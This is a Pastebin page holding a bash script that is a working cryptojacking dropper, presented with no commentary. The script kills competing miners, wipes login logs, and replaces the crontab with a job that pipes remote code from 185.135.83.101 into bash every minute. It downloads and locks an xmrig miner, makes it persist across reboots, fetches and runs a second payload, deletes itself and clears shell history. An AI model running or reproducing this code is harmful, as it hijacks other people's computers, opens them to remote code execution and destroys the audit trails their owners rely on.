Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- SHELL=/bin/sh
- PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
- function kills() {
- #ps aux |grep -v sourplum | awk '{if($3>20.0) print $2}' | while read procid
- #do
- #pkill -f $procid
- #done
- chattr -i /usr/sbin/scout_reporterd
- rm -f /usr/sbin/scout_reporterd
- touch /usr/sbin/scout_reporterd
- chattr +i /usr/sbin/scout_reporterd
- chattr -i -R /tmp
- rm -f /tmp/*
- pkill -f sourplum
- pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
- rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
- rm -rf /tmp/*index_bak*
- rm -rf /tmp/*httpd.conf*
- rm -rf /tmp/*httpd.conf
- rm -rf /tmp/a7b104c270
- pkill -f AnXqV.yam
- ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
- ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
- ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
- ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
- ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
- ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
- ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
- ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
- ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
- ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
- ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
- ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
- ps ax|grep -o './[0-9]* -c'| xargs pkill -f
- pkill -f biosetjenkins
- pkill -f Loopback
- pkill -f apaceha
- pkill -f cryptonight
- pkill -f stratum
- pkill -f mixnerdx
- pkill -f performedl
- pkill -f JnKihGjn
- pkill -f irqba2anc1
- pkill -f irqba5xnc1
- pkill -f irqbnc1
- pkill -f ir29xc1
- pkill -f conns
- pkill -f irqbalance
- pkill -f crypto-pool
- pkill -f minexmr
- pkill -f XJnRj
- pkill -f NXLAi
- pkill -f BI5zj
- pkill -f askdljlqw
- pkill -f minerd
- pkill -f minergate
- pkill -f Guard.sh
- pkill -f ysaydh
- pkill -f bonns
- pkill -f donns
- pkill -f kxjd
- pkill -f Duck.sh
- pkill -f bonn.sh
- pkill -f conn.sh
- pkill -f kworker34
- pkill -f kw.sh
- pkill -f pro.sh
- pkill -f polkitd
- pkill -f acpid
- pkill -f icb5o
- pkill -f nopxi
- pkill -f irqbalanc1
- pkill -f minerd
- pkill -f i586
- pkill -f gddr
- pkill -f mstxmr
- pkill -f ddg.2011
- pkill -f wnTKYg
- pkill -f deamon
- pkill -f disk_genius
- pkill -f sourplum
- rm -rf /tmp/httpd.conf
- rm -rf /tmp/conn
- rm -rf /tmp/conns
- rm -f /tmp/irq.sh
- rm -f /tmp/irqbalanc1
- rm -f /tmp/irq
- PORT_NUMBER=3333
- lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
- PORT_NUMBER=5555
- lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
- PORT_NUMBER=7777
- lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
- PORT_NUMBER=14444
- lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
- }
- function cleans() {
- echo "" > /var/log/wtmp
- echo "" > /var/log/secure
- }
- function newkill()
- {
- ps aux | awk '{if($3>50.0 && $11 !~ /scsid/ ) print $2}'| while read procid
- do
- kill -9 $procid
- done
- }
- U="http://185.135.83.101"
- A=`/bin/uname -m`
- [ $A != 'x86_64' ] && exit 1
- ps -fe|grep -w .scsid |grep -v grep
- if [ $? -eq 0 ]
- then
- pwd
- else
- chattr -i /usr/sbin/scout_reporterd
- rm -f /usr/sbin/scout_reporterd
- touch /usr/sbin/scout_reporterd
- chattr +i /usr/sbin/scout_reporterd
- ps aux | awk '{if($3>50.0) print $2}'| while read procid
- do
- kill -9 $procid
- done
- cd $HOME
- crontab -r || true && \
- echo "* * * * * /usr/bin/curl -s http://185.135.83.101/s | bash -s" >> /tmp/.crons || true && \
- crontab /tmp/.crons || true && \
- rm -rf /tmp/.crons
- if [ ! -f "$HOME/.scsid" ] ; then
- wget -qO .scsid $U/bin/xmrig &> /dev/null || curl $U/bin/xmrig -o .scsid
- chmod +x $HOME/.scsid
- else
- filename=$HOME/.scsid
- filesize=`ls -l $filename | awk '{ print $5 }'`
- if [ $filesize -lt 1700930 ]
- then
- chattr -i $HOME/.scsid
- rm -f $HOME/.scsid
- wget -qO .scsid $U/bin/xmrig &> /dev/null || curl $U/bin/xmrig -o .scsid
- chmod +x $HOME/.scsid
- fi
- fi
- chattr -i $HOME/.m &> /dev/null
- rm -f $HOME/.m
- wget -qO .m $U/bin/config.json &> /dev/null || curl $U/bin/config.json -o .m
- chmod +x $HOME/.scsid
- chattr +i $HOME/.scsid &> /dev/null
- chattr +i $HOME/.m &> /dev/null
- if [ $UID == 0 ]; then
- echo "vm.nr_hugepages = 128" >> /etc/sysctl.conf
- sysctl -p &> /dev/null
- chattr +i $HOME/.scsid &> /dev/null
- chattr +i $HOME/.m &> /dev/null
- fi
- chattr -i $HOME/.scsid
- chmod +x $HOME/.scsid
- chattr +i $HOME/.scsid
- $HOME/.scsid > /dev/null &
- echo -e "$(crontab -l)\n@reboot $HOME/.scsid" | crontab
- [ $0 != 'bash' ] && rm -f $0
- history -c
- fi
- sum=`expr $RANDOM % 21`
- sleep $sum
- ps -fe|grep -w .koo |grep -v grep
- if [ $? -eq 0 ]
- then
- pwd
- else
- wget -qO /tmp/.koo http://185.135.83.101/k &> /dev/null || curl http://185.135.83.101/k -o /tmp/.koo
- chmod +x /tmp/.koo
- nohup bash /tmp/.koo >/dev/null 2>&1 &
- fi
- exit 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement